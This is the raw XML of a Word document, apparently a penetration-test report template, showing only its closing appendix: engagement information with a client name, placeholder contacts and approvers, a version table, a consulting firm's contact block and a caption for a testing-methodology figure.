        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Table A.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
        </w:rPr>
        <w:t>Tools used during assessment</w:t>
      </w:r>
      <w:bookmarkStart w:id="29" w:name="_kzx5oj6hc3zc" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="0FD1B77C" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="613CD102" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="1271DE24" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="50BA066D" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="7E450B4D" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="69D9D493" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="41F4BC2E" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="1D0AE2A9" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="161EC4F2" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="15621F5A" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="3308CC22" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="5A9CB26D" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="6DEF5AAA" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="595C1B4E" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="6674BC9C" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="42217EA9" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="49088C95" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="4CC74919" w14:textId="77777777" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="5637786F" w14:textId="144C2A96" w:rsidR="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="490A828D" w14:textId="333F2EB2" w:rsidR="009569BD" w:rsidRDefault="009569BD" w:rsidP="005B7152">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19EF237B" w14:textId="0630DDBC" w:rsidR="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB723AE" w14:textId="5BE08E65" w:rsidR="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF8DF0F" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc250359503"/>
      <w:r>
        <w:t>APPENDIX B - ENGAGEMENT INFORMATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="489231B8" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_veb77t36itfa"/>
      <w:bookmarkStart w:id="32" w:name="_Toc419992788"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:t>Client Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>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444C92" w14:paraId="5F613309" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2B8A2F92" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6720" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6F4FB1B4" w14:textId="285B308C" w:rsidR="00444C92" w:rsidRDefault="00297608" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000F1767">
              <w:rPr>
                <w:lang w:val="en-DE"/>
              </w:rPr>
              <w:t>TechShield</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="01416B6F" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2EEFC8CC" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Primary Contact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6720" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3FF6FC7F" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;Person Name&gt;,</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;Person’s Title&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="181EC3E8" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="45C325E4" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Approvers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6720" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6A9167E1" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The following people are authorized to change the scope of engagement and modify the terms of the engagement</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="674B160D" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00063B3B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;PERSON NAME 1&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4699DF77" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00063B3B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;PERSON NAME 2&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F4E4F6E" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92"/>
    <w:p w14:paraId="2A4A18FC" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_zew1fi62hkvd"/>
      <w:bookmarkStart w:id="34" w:name="_Toc595845494"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:t>Version Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>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44C92" w14:paraId="4377C0B5" w14:textId="77777777" w:rsidTr="008A21E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="039BE5"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="77AD5648" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="039BE5"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4FD40716" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="039BE5"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1420A572" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="4A8A5C6B" w14:textId="77777777" w:rsidTr="008A21E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6428C5BB" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0B3678F1" w14:textId="656B5ACC" w:rsidR="00444C92" w:rsidRDefault="009D4D33" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>15.09.2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="43CA7F81" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Initial report to client</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39084592" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92"/>
    <w:p w14:paraId="0D61BD92" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_mmygx7611ii0"/>
      <w:bookmarkStart w:id="36" w:name="_Toc1556393393"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:t>Contact Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>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444C92" w14:paraId="20E1286B" w14:textId="77777777" w:rsidTr="008A21E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="79B2411C" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6720" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4678BC6B" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;TEAM NAME&gt; Consulting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="5A090432" w14:textId="77777777" w:rsidTr="008A21E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="78D858A6" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6720" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1ECDD8F5" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>1001 Fake Street, Gotham, NY 11201</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="44CFBB3F" w14:textId="77777777" w:rsidTr="008A21E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="26F2E029" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Phone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6720" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4E8E513F" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>555-185-1782</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="3715DBC4" w14:textId="77777777" w:rsidTr="008A21E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="704F4629" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6720" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2C4390C7" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;REPLACE WITH PROVIDED EMAIL&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C9CADE4" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92"/>
    <w:p w14:paraId="0089BFF4" w14:textId="079205F4" w:rsidR="005B7152" w:rsidRPr="005B7152" w:rsidRDefault="005B7152" w:rsidP="28E2C82A"/>
    <w:p w14:paraId="50C39DC5" w14:textId="6CB9E4C0" w:rsidR="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152"/>
    <w:p w14:paraId="643EE3F7" w14:textId="77777777" w:rsidR="001F4FF0" w:rsidRDefault="001F4FF0" w:rsidP="005B7152"/>
    <w:p w14:paraId="66D3AADE" w14:textId="77777777" w:rsidR="001F4FF0" w:rsidRDefault="001F4FF0" w:rsidP="005B7152"/>
    <w:p w14:paraId="2D512731" w14:textId="77777777" w:rsidR="001F4FF0" w:rsidRDefault="001F4FF0" w:rsidP="005B7152"/>
    <w:p w14:paraId="6A425EDD" w14:textId="77777777" w:rsidR="001F4FF0" w:rsidRDefault="001F4FF0" w:rsidP="001F4FF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E9D71B5" wp14:editId="0129912B">
            <wp:extent cx="5486400" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="19050" b="0"/>
            <wp:docPr id="1379991731"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F3E2851" w14:textId="138A21EB" w:rsidR="001F4FF0" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1037">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Figure:</w:t>
      </w:r>
      <w:r w:rsidR="001F4FF0" w:rsidRPr="002E1037">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F4FF0" w:rsidRPr="002E1037">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Four</w:t>
      </w:r>
      <w:r w:rsidR="001F4FF0" w:rsidRPr="002E1037">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>-phase testing methodology used in the assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF39589" w14:textId="77777777" w:rsidR="00005066" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
